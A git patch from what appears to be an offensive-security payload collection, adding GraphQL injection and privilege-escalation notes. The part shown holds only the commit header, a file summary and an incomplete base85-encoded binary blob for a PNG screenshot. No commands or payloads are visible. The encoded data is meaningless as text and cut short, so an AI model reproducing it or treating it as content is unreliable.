From 93f6c03b54fd239486233f0b46bba513ba1e7046 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 13:46:40 +0200 Subject: [PATCH] GraphQL + LXD/etc/passwd PrivEsc + Win firewall --- GraphQL Injection/Images/htb-help.png | Bin 0 -> 21217 bytes GraphQL Injection/README.md | 21 ++++++++++++------ .../Linux - Privilege Escalation.md | 10 +++++++++ .../Network Pivoting Techniques.md | 1 + .../Windows - Privilege Escalation.md | 7 ++++++ SAML Injection/README.md | 2 +- 6 files changed, 33 insertions(+), 8 deletions(-) create mode 100644 GraphQL Injection/Images/htb-help.png diff --git a/GraphQL Injection/Images/htb-help.png b/GraphQL Injection/Images/htb-help.png new file mode 100644 index 0000000000000000000000000000000000000000..5b0493be7a70da5f0a51f6d7b4163f973da4d949 GIT binary patch literal 21217 zcmb@ubyQSg+c%1Z1)`vIh=g=E2r4Bl-QC??DhNnQ3qwdrcej9ubO}gHgLF5XYxH^E z?^|bmXPxuMaV>RbnAx-UeP8j5YxCi?v?%%={5vQpDClCZgyc|AuC~DAj$5ek?{h+_ zH2Ckj{Yx>0Tkyx@mO%hK$8!)?aget*a&XqQGej}AvbHp&x7W8bG_kA>wG9wmw8 zqM$rR5fgf$;F7R5>Fn{)@#1KEBxX-M0^OIKob-j;@_mJmIaCSa#ffij)Cvf53pF@X zJ$~uKXp*P(i!FDEqM5{3}-z_y?&e* zm6RvZa(s;UD)PlQ!Dx4p{|87*M(83R-0C+KW1&MnAmyPK^LvkcAe2ebUW9z$yIe+& zhdp~|Z_K=K8~&C%Y6`4oL*WRErsWHr|XrhPHVq%OByw6or*nAo#f=@w+{}CcIMl=61cIV#TQ=F zvFGIGjy8Dm3Y=|SGc`5k;^k#E_;G)uc9Y-3(-ZN?-MsvY%SuKpE|<+?R->+>)047{ z_jhsZ2BkQeU3ccOEgM~TjZp6qzA`bP%FfQ7UtE;a)C|eZrM+_Hio@m+lEDc76Y+S-&-@jngd%Ci+{7&NNB!U{;edUcDNo4f9G zqqc5;SiNqm`R={8DK$$JNlGl^o`jhs_l;tL)9Cb^oWOv9TN9I${j2*1#>R8Av+txc z?W@8<2srhaaI5A*dGR$Goz~S}zI=)M%+104Jw0;gI)7~3S2Z=I)~s>RZ4G>cUN8-3 zMM_HAmB<_W`SW9|niWc`>ILkE^Mmo+f<}JNldagsv-dMC{)6S_%9PRxKlVqod*LZj zUn%2K;vz9-E`k0#fc2Mif-lS)U;7job zj~=~GP9`ZRC^$Mj9n6rxp`oFPAM$U~(SbL3oNc%54|~GDu;Kn^XJ^BARFR7v8#fs~ z11Co8woDor7>KWNIVdAARGZ*=zCW@Ht0k+Z78n~lqBx|zZg&fXgoK2m+RSWxp)+=F zZLKR+I0#=uTUAx8(rU8Lto+|HN+}B@5%=!hRrpi2+rx{;X_Zj22~osi zHNka{kn6d)_#IeHzMUUrdw+%`Ozr>tq;}ev5OZ?kfNh6GR#vrU!ykpi!d71SY(3pz zU}$K&nqN6PH#hj(TwSnmgw~P{`>tC(ap`DqWF%HkPmc*(yxaJMZ5t6T8mgYY{*_O> z&I~$IzWVz5aB8|^Wu{Jtw8*UuU5&8%+}Ycksa|Qt(OKiXS&)~Du+UmLABz6?@oScB z8llA^~9PpTQ-V7{8%J9$3w@03Bhk1XS zoJ_pDIBYa9G8)_4y*S<6{dx^!>$eZaK)yO>LPEmU;o;JD8_830a$o(n(Cve9>%m-Q z#&MF;P*z3;4N7285Hq6t=;-LPTy~KP zU5J%>B+3Z+H+Jo|Z{Mg^$2!al>x~YLs*iVW^?TjXIZbgjG#@%7F~u_VqBnoq+C=XYL0!m*afk(3Yc@x}G@QoEfhC+zNep6ro6e*ESpiN}3wYikIf&w0sg zrkJv_vPUN;c5Ot?ujS-kT3InDDk`4s4a!V-ovu5q4x>ZWK*%nAkBW(jh>H_bQNdNq z$1WX}R8_^(($X?v!~bdK7|A)*4H^CE6D~vyqxutMjSi?7nGM%1R}1m?7p+ep&|%Uk zR*A1O@XXj(R@c%Zwr)J4k}jNkvUf%E~%ul~|yb|3xO5 zKP1$vrlw|gcJ`&AA;t0Wu?ijbyLa!_zAGxj7khbmb@;!FuUV@h+b5FMC#z#8Yo=8$ zs7shZ769c$iFo~v>FGu-%*ezr0g=XFAZ(gVcI&|?Tw6$ZHuCo|0LkeKQl8UWtG`) zVqFjtn5{N!jJ=ti>>K)|!c*kx(RNZ$w6yqRR94ra536;& z@Ii&o+Yap;v*Ei!F|xI_omt6DwmLXC$Qm+p;7N=~=f;GVldaA;0jZ)u^Jsf}yPL;v zcd1uiPOceRTkqGm*KXgsmE}B0`rOsEy895)d2hKtt^LCML_%8HN=aix!yX-)Psbr_ zaJ0CvqhqqAo& z<%f|mG2e3(bGdA1uUA)B&(F^n>9(LsC-Ss@V%8@NtuG%-;P)J(#B*|XHg5L4T?bVV zSxKM+He8&T$Iq^=O1Qdmt5;a0WMu`AcparQecSJ3Y$Ru3`1_u-9SJm4AHm(dn(At1 zk0YCg(+%E%!9i$Z-&$Ko%U~H_6poAspCvtWA2xE(NbCQ-u^|l&OC+s-%)w%hV>`IwYuI!u z&!MmO@}JWA+{CC@Nn6}Gjh@if)g>LTu)LP#Og4eAZuk%z8#}3Dw%OLwa!pxTdCL3J z)6U)=&WMzSB_dYKO^lk>hWudIL|%SSy^{Y3zE5xe&k&t<17V0r8eefiO868$`!1gM zb}Np@!Kks2sOb1NIsL8QO~~f<@ZrP0T4(DRM(xnZNcpt$;e*=g^U!?t%AJK+?b$zn z%p$+}I6gcAkPsCc%j&TF`m39u&g6*^Bzs3kN8jo`z!^@pFEfja-vO`@cr1UPsJ6GY zw{MxAo=*9<5ZhT^5QvM9WCC+LLWy{}T(%xFHXNl+I^DQ&gAcad1AdA=#kG_r;W=Ta zDUufMJnb1fT57C4AQg@s)M}MFJyu~kjy$}2-8qy|R5mZ4L?l2X9Nf0f#Ifw?>tGRA-h9%5tfKu(PP#QO^y zHP8VMqSMgQ>aUNL*Fi-A9KdSW@z9@y=?P@mE!&Kb@w%jAO&P;~VP>kM#sFUn92>v#^On7d_#*4>+9|Gqak(?|8H44?|ZAXVV3g5G5{buD=RaL(? zH)UcOH2cgbrm<6>u}7VWzeJW)74C%WnCR&6m>3c0@J&rk*KgjOTU`w*EoHs9xImd- zT9Q{(e6Lmbl%781=*R{7-L1QKTLuS9yYE5Z7R9GmZd@X-s>o~yl_#zL$I4(PBmx={ zPgGyuYYhzz!asE-B@sb5jCOm=vH*&1VPLck4V5ci#d-P5xL5_+-zP~*$R27&#x@I% zN@o@1wfXCD;`MZQF949*TN(6k@I2*7xIUr?FbK#1zz$v58R#z+TsovegJw^g8!t|1 zU%Ys+w>FB!$ys@DPYOiG~YuQR6*q`HST4xo&Clk=4dI_8D+JsiJ1fhi^!!%8YJ1)T z*vqoZYCzkWX5 z;K?}Nb9%5Iq*a)im9<>5zH62~vZ`9FcY{_b?|I=!r88G*q8KJJ5V)jWmqqOCSOoph zOqE=PpcPBRGTivR>3!*5>bx;K+x(GKkjwkRBUiE#SPU}?&60@Zvnl}2pP@_5mkPYoAc4{@G z39~2czN;9wS_smw8RT>QB!}|+SRKfgO1_fBix*c!(zYW=M)L+&sOac~ z3P34N&A>V+#r3?nC3$?~Z2&uu1j7&feqVcu6vWE4+52<}NS|gd+}v#_y(^ zBnD0IZg@b~h3M;V^u7d+3YgFrwyD&l|A|temK5~E5iNImn&^%c6*I`#P(tqJgZ1&z zYWt`D_lTZA(8Km24!xiq5pY=OtPbbH>B3pP)Y17Yr42;tcMxO4=e)c;&CGrEdN+0m z3aiPQa+6ai;5g3C&JH|8{um@i(8@Z@H53$t;1A-=vwA{YT>J>=@2?6=0>G5(JOKmY zdJl+#`b`Xg`k@hWeH_e`DFuqSv$L~2TAI1T&j$_Jr;{iJb+v_w(DRmv;D@aY%3`Q% z`Es0jLuPouoQa8vJ8l*Co7ByFnGde+=c!lTd&6zNxb;gv3>mv9e0+Skd@f9PvFRRD zQlh@O1k9gba~Y4^3izmti_2CQYwvwR!o1-766m%|ioC^U;;=r`9=qtU0hMBQ+MfH0 zTJU$_6c%N%H@UaQag~aZ(YfjpAcj$IQg;M}1Qk7fekDKbIND}h9ZKioQnL4AnD-f3XDs8=T$q3pRZLAuNeQyB0LZ@uO2A`Q*2vAq zOD)yHk=5hnw6MMvhb{zXSc;&32_T=I1n$847!>tC*r1CA2umQT zv22msRNj?`Is0g)X44K_VM^`NP##ug*!r$bUouA#gvaqmV8FA|x z66WyQxSL_lYI_}L44DVWBye3})7shUpe@vh!Pot)^+Y3$lGJOXdMVvcg=;=m+e`Og zZFE0|QLC=1=>SUI5-0?YReQ+#UUzY_3fc%~l^0|(Qk~%FH0q9T6}UW>xpU_ZbS)(L zJN4&({P_8C-`LLzh`mQ@`7t2Ya8xza)ZhyU2rOXEz|*K)W%iT(RZ%D{s6JPqO)8mR z`xqZDZeo&E;$1r0HC6A|e?;(n8pYN-7?Pedb z*_hylvI40j8OQSe=T8Lyq#^+0fip=a@+el5R%ffMmN;MVVy4xPrknjM4nP~d&bCFRlla7-WIS`*`~3xBB`4m9e~S0h zQ(IU>WY`@Y|Mct62n;#3qR=A__R1|N7Ez*9PoF+zb>7hMcgB41K-anAw&)T&ztfsZ zkO;Rq<}9h8ADjDljTz?T;&3y!nx9@TbX*LC(72YJy1S;-%L(jK)qq?XB3Amr+y8T0OBe z6=1KhniK~Ryt~-lV!%=iH4utgCj{27fM7x! zWHsQ3emkC^E|nUEv*4oTY1YPo>H%%hTUYn^wYr!v{izuIUxwSs`1_By4nb>1`rrR!dsT5SF9v{vwe7N`3v zfH{5pDMJGT9hNxACxwU^sL-=3D<7mYujMHdMMg%(v72LqsSC#xZ zn$W6gw{Img2uNpV9teU16p)lAZf{FE8wE}DVfWcHbPQR;1w1WEQ0uilwYALT(y}C;Y4D6gqKy- z3@R!*zCmf;V#D1xpf=bp_W=)OvA_&{Kqf*(GD|6wB&nzOBvU5Y=vR?03K|}Z@5W^9 zwc%Vmfy*;ipnOOT>1b<)axRDV*|WrJH}5gIA6S6)1-oD+E5MG1dJU>lQMH|O3pyu~ z;v>kjHde9l@IH)MP{Id*fdIm6|MBB@5AWvnJkCf?jw4z3pL9TFpt%|iImgDt=&{5t z59Q)mSy^#}xm&MnJCv!Q01Skc^pv5w7fXkoU$ zzrHnU{ogn92^kr4oFp)}`F!rQ9LMYz^92qa|?i8LfmW4$96f9NButQncB+6 zMuEkgN#4QFXP4`(CYz3>l|Ak4AF{HjpejWfAS(?eAgjAL48NC_+CZ7BI$lIvS&haE zYE2~vYSJKdxG`xtmFeh>8ro0@-J~7j_d`gC;rx&A4({n+cJ5_5^|#ZqaV9~7HtdYq zo(*D*h>H3)kRhQ?PYRlsnZuvYF(yihj-os?Y3VpAK3xtraUWbEFm!w z3Mwxk!{7CXQ*)q)1d|95GcqzlKt-3_dtM#9xv-FNHjQujXBa6j0+BE(t=6K?dItSJ z54t$mCQKH;m;g2%0RtSLcQPv+v^k3j`&q> zjsxX;9@^+0lo8c&e}8{0Vq$0n2`n#{Zk4Nb1NZ|rKJ)DZ7GUnstu31k@OZFEWJCiq znAw-4C3>aY)o6#~cN?>D*XykghToPe%mVbKq@?tNJ_8g1(B#?4Y9RoWoAp|SQSX(M zmG%E>2pr1fWor48he2tZv;au_?h%Ot&Iu0>7dI8r?_6(i(m8(-6&=k!`U~naY{Ua% z;sWw-p%x=iB_%8fnX=eadMw={Ee2ah#|5wr_BT=sEMaT&)XH;)4pswz2x$+Wf5>fv zg@oYbIV`@(^HNgP2w$s zZUCR-bdi_rex(@_9E|2K@<$zi1lGWkVTorT3@OD8-ak1xnVp{(($mu`okdxtScS{7 zv$J~zs|})t?C`?kVu{D`4(jC)xiFNv4k^v|@892R(;%ax3x*mL4NhGch!Apeas#t- zE3b;#TKnxwxz+H^^_Lpcm^t=p*vlE2ofKW#tx)~Udx3{+=dmumu>eHRW!#2I* zUuT-oR6*w$^-ShDxu|p5ej*x1ywER7QZD8~pl%gbL#ZQb{M;nSmkW$jMdG%J;SWqI z){?o$zI*LYlZ!ywMUebz4Z=aXDZn7-U?-sbl>fO{SFN^NFdUDqs;R22Wi=nBLyU@l zb(_;zM=Sx2KLSstJx{eX{@FWORn_dXoq}`ruSnYldJCj3IX8Elb;Gfr_t_i?ol4Pj zQ~BMGfw?J-#>t*Bpb#L{0zhnFS3yWg`Wsn~)2mk$>9^hc>gMX$8ADG_K_RQ5A!%#N zTwGk7{^bjc&Q}x^KMWFSs8HjT)*!0{K;Z)9Y5B#^;@>{9Co?cGfOc96ZtOo{_+EGK z>dJ~3AQE7?B84MR6thu{M}AdWlK{pSE*vSfp5`~?@c+Vv8CzRhYZq7f9ZZ)_z^r|F zUSNL)goG%1@wbJMC=Z*KtHCZKZ9T}Pf7%&Q&Jc704f}5PwO_?PNFsiPB2l^xfFu5y z^64Ts6ln(@&3e<>wN?%JX*FoPJj1@#AN{^Bvf z`r4GWJr}kl$guUJvQ}!=A}u`VQ$+C>g$JiO zMl};Phl*@5r5w&mm?%SqjTdHDxE%jHgsRN3uOmfGOFP$!qkY}PVdwY@IVGjt#hI(& z!#TO1e75QISTkdLZXhSDA)7_V4>ubdCNLoN&W^S%ISM!5-MCBW_38sS@gRs;M{)_Z z$;&4z%3C`gtf_+i|HWuuR!ge~?3W`jCZfVWKt_OCiJTHq&$y7*@C+ppK+0%`6ZT<~ zPHa5*iI;69Z!=z2Iixn)_6fo zEU^ev6kvlo3jA|u=BC-LE5o_EWFo;PC7Ph!1COqzyN0b?3x#|bA)Hzb3LrNi*2x-2 z^Fz_c&gm*V5%DWT>(ST_l$4Plz&e9k4sxqTB*?+!UU7Cl zRLaKLkaRoTpiirR8E`M7SZxy2Z-5ZD@7|R!_%iAqRd1sKuCkB)JV%@FZLD7a+~LA1!c zH_rxK3nL_-f3|?xQFWrAps)q%Pl?yL8FuD2BOh1F(rnb*nrlu z`BH>$*{+yvcyJ=R=?nhaGdz)QVGF?d!6Yb#V&i82tK1KK6wo?FA;>8nV5de8H3({F z$blBGu$irkROXMQe0sC)-n&N$PB@@Y-m@$NQ7}%B<-Z2BN$V4IQlZssu|Pn9P_s>! zO#WI7x&7m=K0Y7@vmvWC04|LkDMu*rOR&>Wozw$o-&di5>H7BVTj)W$Z1^97gTHlm z=hwF&{T`kuH})1sMFoYA2?>&*JHygYu(AD|QJaOcT_|>eh>7L95qv+@w0zZ%9{VnM zWw7G_J(%Jo*9noHSbs5F9NGws50F8Fgq4ShhugPrH-U3#Y;0_}h$IX^ng>a!lyF5F-GtJ9=C~muckbS8@9k9w1|z*kLCwEmEO6XE zp(Z~^THfF#8Gp{n%d4Rg`8V3-Yr=r{|H+2S9c{O1q!>-;Wxl#KSg086O&^=oYs_q7 zdT)35p&r}$u+wz4IOXNDuph0%`;4B-;*RBeCk1I!B3=nHvy`Ra|D zRkaMpzn2+fvi-xRxT$Lb1?@LdmuIY`kg6W++ zfj0TvPp1u*JMJv`@$`)f8UruNe#Wzt*nv9&%KbaFe52OD#J}wKU*`#)Rtu;6M@A|VU%=Q^XYE22*UB$(8x}_TZ3T1qI9BLwRK%k<3s(H z`a7IQ%ilD~G*yeU%Q8|lSb|!cL6?hT(j`QJ2^*LZNCcswztUP8EGKW2E##=rj6VtW zIMORXD*569X(Fv3BO?drFRU7lv7r@MIcq~3c?vvl+`2IlM_Xger1qdfzs;$j@xsjy z4X^nc2H$fru@93fhnv&A&_qBDB?nbXA<{EWl2RlXw|%!)KnAR~QJ6!6G+Rni{}J$j z4DXp68yvTB!vF8oTCPw~q^>pRqtm1jSuI1|WeM(y6D9temz=W*HJvAYxibZV=WGTK z<1Aw6>)H|BjkvFV)YXM4c+GxjLx#cfcqJpaPJDZPEhx(lJX2n$meL7aO&8~F zCM0x0)flaDq(uS9odJ`G7NaFM-ase7eE2iu>({T8hvW6`&LC&5ZJ4)5P+Y%pqZrC+ z4841Hzmw(q+nXE4KR%LnAThC$YAlRi*!R-U!g4Htuyg&U{}v2IapIdpnE?%o4U7hU zflH47e-f{%_68JiL#t-|2m->wjA4`!geo8VCCuaFB|$momfAmXLt$-5$SV)kYZU{SFA!yL&J<8vd>#G7~8IJDX0jG#0~2JV=yy` z&Pv603*rr+ekgHMBCpDU;a;>DZVnx;lnqyP{0`0CNl*6q==kG}s<#Q4tSF7?iuO=? zbZ3SM7PaCwx-U=j0@A352mA-_+zs0S|Zf=Wj2q#Dx~^$|zYaQ>zetdldtN zhgg)7Izu^%DBvGr;r@#L^hp*>$?(L){IW!DdrBm{fbrQ@P-#pDzifl%JG;0j{rpYi zL`ghhYOftfFmFGci;xb4URev|R@ z6Tbm{j&oF55X?rHQUL?ir*g_I=+`fmuEkFG9%P%D{qwu;$5!akofr@Gz=naYM&r}Z zvVyYJag4KQeCMvr*w2@;XNTgZ_RvcxYfAlUXJ)TM@V>H&yP?hb$T`$zZj_)Ne=@8` zqWc}eGuO4qW+m>bMU^6*D`4_2fZC%E9SzA3kP;|hqO)^v3A;9MRgmTvZDHNjugm?+ zF#jT^<)Ukv<|(k($ETq=34?2TkhLB_SdNZWMcdZb&B4a)N)||7UN+HkU5FMLFUJ8h zjQ?brOv`2F##bJ@29y5X5Mue)ukQmRro`aedfd|^4Q?1AtW~Y&5JP`fI1E|_J}Uf} zto_`vJp2*uMQT*l-$u*kpHosow8Vym>zw7@v={@w@ z0@G1ZS-BJ-A#mEqz90GP>mC8Ck5Su3blU%BZUgwqNpU?d(j;pED0HY}5iazox&~g$MCP6e1!h zCkL}T)%Ak^)|2Q}WP4G&!7S+edSHYhxjYJ}-+lG&Hi(-enA_XNAg^(HA9vn4JFB7U z^zq>}s{6MQ=YZnW>99e;Q&k-mXVHiS+LBw?un1#VKv!lqH`|axGt4~S{5o!ZNdVZ6 z*ma)N5V6@X{sRpWjo8O|4C@Yh-oc2po63^e3Kd!MFk0oh_H_WUAN}4o2S}c5@;iG<)cfrwxcx&(_DOvs%o%>3`BfrFVo3rq|?8v(H0@87;{tWq+6L(6T&FqHV2 z(V)?vp9nmr&jMavn&8Z%k&-rnK1Pi6J;0=i+6)Q|L|SMtg@Tkxtf#$T5Fn(ok`tz^ zkf;S*d5%*ZAiW?&F*3^3uG7%w!qfvV2LI7xQqmNMb^IT|2Va6dfK-9Tq~h5=fb`a% z5rm{a7*kV803R`lh(h{Jo-i{%cr!4-!l3a=Z@EvmJM`}q`pYsBf2+^(xkJIk&*EX} zB7qSVXu7-Xc6$RzI%L&tc0mDuiyJ2HmU<{4%*CCY?tvIQoM=)GTq+pOuOG&u0c-Vq zB=td#ib8V*H&e^aG_FJ-vR%l~aF@h*ZDRv;6IO2SYUCJbzY{n2D3s;qW-s%(#YK_c zr111iW0t(P2}=1&SdWH+V2Bz-6<~I^fCOhcZ%z>kcqM?*Jv%cqwf5=Xy%?vqRCopX zpfeGX zHI6j63Nm=?j@`5Nc53pcPahCH+wwlY4#rb6hybhWX%rwCH&4|I*j${w7a2!RMFW-v zb0f+S*g3eGkStM#s6I_bwdv{PFJIPNyHE7&V`{42zyL$UM;pHsLH`Qzv%fW9cBdbC zkA-(ZZBb5++Hnm`lwt6zoHrs`6%-T|0rcO7&fN$FYje4uOu?1PAHohMI|#Y$qM)C? z1yA+QNL^^W90VEM(7*JnbZS8ygpGrPw!h*N)Dn1fTI|o@&K~VWa zF<-s_)5|9PdKdeJl>~LJ(*L?>Kxlp|d&^b$;+NA6EJ1(c@msWb#Eis!0s?dA;lB+L z7(V+aw2`=5se&eSUk(DGLAS;mZMq$niRu+8om9E*iD?u9Nju&RPnLxv$;b zkIHMjHm3e>ef8g%YCz9(fX|~-%zqKVt$qdtYza{sroV@}Kf4p2s`UTdX#dwORch>b zJ%j2tnhEPRr>%%im6Gy2_P=*g!9b+$*x2+M3=!q)jz1fa1&v` z1v)fHR3Zec4m{vrTgDKH=Px!DO1z@w*ft5S?XHP+{^Kf8knqIk{l#QiUi^xb!^fCk zQDz$#WdSdJZbaYVf2IdmZE@-N!l^RXmZ$SaS6I-|krj!^flbXk&Oc4TL7Kx5c?$zD z_sS+e7-P|G@tc|7Q{ORVX_-uZRH~E5J1TKajFDs10&6+js8`?XVFTfhXFi&7$FdJl zn02MeFU8vCMrw913+$gB%kWS7*ACgLmlz2uyw**jTIHC71aY&u0+f9 z^yaQ>WD_?1&8+&*EQST}=R{<@(aj!p5v+VKJf`d*ayhY=A4kXN*K@6>oqLjqa4h

*J4(=DI!gp{n=$_L}kJJT$~!I-RJd9=FISYARmO{w$Ce%F)x zk70N#<$m61`Ajq_{WkythIO3H*b}8kOrD_iHRfXD zZr)IT@-b!VV6yIKLJ!9noxMS=ysAj5RyP?#`Iy$xzl-=awEUxpjLqz5M~j5`()u=o z+M|}2UJ?oJt89Es%^@k)i&$%Ei{H&P{#bhV>L@qxXuaqw(Rf$)lhAW`I%SuD@UMf1bAfA5{APb{F8^WBeZ>?%42}1&kHLfW){Z zn6p08ndaS-|H;57`8+Iy*w{wS_0pLwBO@b5szqiSFB zcoPlNd(B-5#mgr}{_ckZ1M=G*J-YE6dPlwEe*<@Z-o{&^GMYI%mi07wi%i*?GW%~E8X->#KbQ%W1*AJ5ztC^N$yAN+7j z0KGVSNHV}qslwYR_+}Er@O+i>8xd80KB1t6{Q~-DLVuInHriz00M`O*HU>htP-|PaubwUsL@3 z)1#x`tE=Xm51jgQqVQ)T?u;97{8a8XZai$#d&_wkySsNHCr!Wi^qaEa8~^xufzieX zGHE5XYX8>H&XT7*9=6X;h-*MQZQ{ql!uB16BZ0JXgu0PP##Lo{m-E8;luBtq6&&=! zjbVAitAgd_mMKle_`m-X)6)Nm!R4Q076!j$86^)4HgH-!oPK`YJgFVaJ7vxe6dj3v zty|Wop1CloI@M9*Xz%H2=6SoR)2;|*M3jq_VE|850e8lu;kM7jKMk`#I~x>H1K)p9 zEFbZ-@4xo~{QnTV|LeYk2wmB*>a2K!Y3nPm(5C~KRSWYZ(5GJwWzR0|E2{{b9f?F- z8;NcC|(bH-qSXQPL^AkqMJKKH{ z-C;Y^4r#DB?P@rEOoM~oBp^e{<%H>XULEBbGcbEGHiwH0tNw$6BLl9pXbovYyenBu z@BUO<1RJf^eB;9!xy(h`q~P|gOXzgBMK!F2+EkfO-F(?f2oaJD6^G*-m9Be6pcwU} zF-a8aLW~8y{6VFQJsz|5qx%Qq4AY4P3Kg!dnMp;;cH62EE#=lYHY|hqBmM#e0j{}k zHahKG&k&g33u(ypgo#&Ljr{ev|0lIHr?fga4I?m5o>6OZzP`}(E18JWeY{$6jr_E5 zY4%ON!dkCmR%4VE!4LPfTPq{$Pb{}M(A@1%sLq+<_C6)1J6wj=wS|3T_QJ@1K){?q zu(na?Awl^mrStCj>uR&tt|r^+Vf+x&O_HB_Nw{@M=Xg;&QDMXSrn1(|M(Vo9SkdasF&YPI-g{Sl&_nibi&6)>KDjaNzPV%ynyD3id(RFR4Gzzbh* zHMowS_4_p$oJT12SJ^stYH!wFW#Z}j0HGLjxsVn1y{dmu+ehuju1L+cd4rgk8QD4e zb+?>tTg86b=Yqb;ej4?oDJp*cCdGAA(YE0|miuy}c1m;HPtj0%YhTK`nprBH@;!Lp zAs^J1cRvTK^Q#_FNFI-B@O0<3Cb5uJ6(Z>eNebT|Q{BEr6b|%~|&P=iHM@)seUy5ktIW)nxc7S&r3%f>2OiTtKYp z@VJ3%|KRFV_KnILX*)ml#5rF(*4;|JG4du7f3xig^B00Feq|$0Z1dj--WyP2z6~ws zT$mq@DKJ7@7=E4JxwWUTJM3UhDa0MAWRN;wLi&fXQ8Qxrf3Lw5C|Z{i9~0SVAY)^Pt_ysqJ!{* zv6)nvzC`P1vxVcAik|W0Sqett>^CF0_=j&Y!f4xbb?Dw4wwXTGrLnnV98aSTxEZB{EWP?tY>3nN)!w z2VGy3bVESHgPm|WFZ4(H3?7BP$NUbe9Ol6MDp zS^u1;^s3b7yNjtJX6f_?hstNY_PDIHHh60i#|Ly1UmRMB=vM=I{3!L&omxI=z!_8a z-LSW1kGT`cPRgOmw4j)J+aaUo?E!l+vO6UXJ<_Ipuu>>%MR&U6^1izUJ(ISbo;6MG zZSFzkgUKl#bX`rhx*Bzv=-X&R!xiuSVvKKOL}O1RDD2%X^J-A>{85aEApEeP5EGuI zyc@9kn6r=lTXrSR7!yXImed;>R&1XSJLoH)?&d~ujM-r1gyL|hV5y%K3ei2H+*=(i zjv~l6M5muf?)=T5K+N#qe-xOZc4Y;Z(kE^u5J~r& z-yX)qNPE8%f~V3EZ1Qf>CiEcXD8yc;>~+Z>zW9QIVY|O5>8E{b7+NFKXk@ka!`)HY zYmKYch_$m%3ax3Y;#o{;%lU&l8+6u&lQq>1eB}+kzYV!n-mH=(FlJL$R!X-3XvRG; z;&0+Nv#R^PjR=bm%xJ!~v@3p^zl>(z z?K-VE>QuiG&zVoVH0=pH*S<`2Tux8bi*l+i-X^?ksAdyGu&tbnGd^~Hef_~})StE@ zL<&Nh52N;7xC7k@M;5r!?1hN@<4Vbvxp>n`|E%TMzgAMcuHYb~sUT!^C-5^Bwwha- zl$%Wa;*Qoq*eeOsNQJ&DE1UMxJz}SwyLG(_QoEhI{9?s2?akYBd?-6wp8^kK!c06} z7^%rL<{R18$2Av`cnI}DD-)*X51iRkXQsqBf@b&EE;a&Rcln&>j zDr4k~uz`peA>{drZTN%UWSHvo*DHn;Zjtjyf$Q-+fzrjb^SvpG(k5 zTherW;a6|>_tW0-h#2N~_#yV3bH_ut9pj5S$>BbSU)HbX3?}H4?Q+hE)sr{M)K49& z+jcW%)Op_9;PoHma%RQV5rP{VIPOfvi?v^{#N8 z@;GO3=W9}W8@I*d_27}iMd4)3Ns`YdjFLmXmpFx>vOs$KF4D)Qzq z20vbp_m8&bSYEEfZEVW3lsISFCzHh#n+|d(yd)c~T0O3H?|biMPZk#<*uDt#zdX@n zY?bghb5vIzQ0d1cc_gJ)ICpxLXCQ`Z?y-zb&#e`x1mMF3X4(rsWu3l0@HDwFmByTYsAc-|YU20wVj)NTE78AC zP+7dV@3fkNQ)}{)bR@ndC)wUwb}Iau^O@`=u*NtIbSv=f+URYL-LcmyLu=vK>`-x{v9Jwx`6y+l+-z z4&zFTLmhN`O7-EF(Hz%3%Ia;wEclc#4=_u^OCwl|t3)neyatluT(UJMUwE;j97VIWL;c^aYNbfJ!& ziK7zn{Y#X}sO&f|>7;BXi)+B6$g3muecvh4ERMVqJKue9T4b;m6!>#_nm>xAH=d|U z==Rv3pvUg>ip~1nb-MU)@j0LBpXGmd^kk4d#PXW*nSHQD>+ zhF=_h%~Ck8i@YcoJ$NY;W98%=sTT>=2kiV;EM?yn4$ajSu$huzhCq__-FttFP9We^ zTXc_TLxbS`W|EBSDq+H|xJlKY7XGl6LfF2Ga+1hS@wUO!?47(6*eTDcDDuJSZTt&U zR%-nLYV)dught8K?J;`Xra6LGmnFy43yL5LcPr@0M+ed$3|yw-?x9dVRNML$z2UoG zk$un4D2|!hW_R=+O+5R%@LxgUSAJHkx?JO_md277&zszD4U(cRE-966CE?hb*lZ=} z8&xGR6#o!i6!6Ul0D#-#m{tlIp8z+K>T#BLq;dUv`Jo~|`!Z#v$1_BhEMT;G+exgUOx z3PW}e_pj(E-O9`I3y>ZkU~Ed&xjvNcNEzWI{9rvy+2(6SV9d>fkLQ`Jr+gy$w+Bwf z8Gm?Lyeyoq_2wsRwW4%Xy0S<|kV4;mEpT5svp-u;y!3OW(AH)CoqST?cEcAKdkv{J zWp88d)~SS8+EKUNXym(Z~_j?HcRHf@o@9LAW zw#P=Tr_X8BFTUx=EW7jBXgaFmS)B9vvA*-#N-XI(5A_6Bs^b_M%4uT5qX zWT%;E@b`Y-M$#a^z7nlmuPwpv6on3@=bUL=PGRgVtWV+sN#OPGfydlha z_SiB#U@3I;DQn6|!8*!C#(iUGn7yexDN<{LSjze)LW;vo-b>SHTe_F3!dEdOI+h{_ zrgUr4I^)q>A~amSiL6H_Ff?*Cx&J+x`itI2Z|RwTy)8<^tPjXsG9KI1tX}2KdG?QvG!=$$I&A_t|lmth^@Liekfk|a0-E$4r(vdB%d&7c~1?j4PiYQ{OQ1SQ2pcz0X! z!f}qL)&?=c8r7%0PIcKjs>{|9`KklW7e3~3Ib3gl=d}<*h?C1Hv8>SG*BM_ByMM?Z zTg|QS(7AP02OIw-lhX?<_`?S2i@g}%>@*nSG4aBDH--U^eGuf%wSM;8os}?lRHNW zD4fic!~2DGFz4FQ+jE*8F2$c-6sxng zi;gGv$5z^s)EQ5-A^>Iu=QTqBNWH8O#cn3NqZP+b@-RXg4YN0qHg^cFo6Gx@k0rS7 zZ|;YCC6@7G@#?e=O#=he{Q)e)oUy&jtr4ul`}Xfh11T5%(obYp8);V;54aDB#yVci z|7<1U?JXQIt?aJfyKNiMiU8@i4#jut#}sb7fRxkS7=D$?^wqITF9T?2e=KEbvA6I? zK93Yoj^3^iM}Nn&6sKa&woy`bX}@KTWn6%S=d}<*h?B?3y$m@(PizhnQeo|$Fu{ny zq+%=nuz|y>Fe*2e??1D>t5=yS2S5x!(p3ST#A=(<6^ z%S4ge#OVbV{_uV$st!+X36keDF)}Cd`;D=A7Hk%U4=Q8HcEm~s;wK_=CqEE2T%t3KkNEw@sVl#Jt@F=jN=j*ki`}}k~wI8)6h;}GM z)1pr>=i9NC#kPbvuP>u*>E77aT&V`Zb@dqET=Ea^XhrjdiB<&g-n>1w5}0O5S|^%; z5z;_6K<&A29qt6ppmS{<7!Z2Ti{=Ys9pQ@Yd!Dxy>nInVyGLS#v{<<#v_D>f5z+|0 zaR{wBjQxm}<9=fa>QtN-QZLG=A_FPsf3A|$%L*~Mt$oVJ 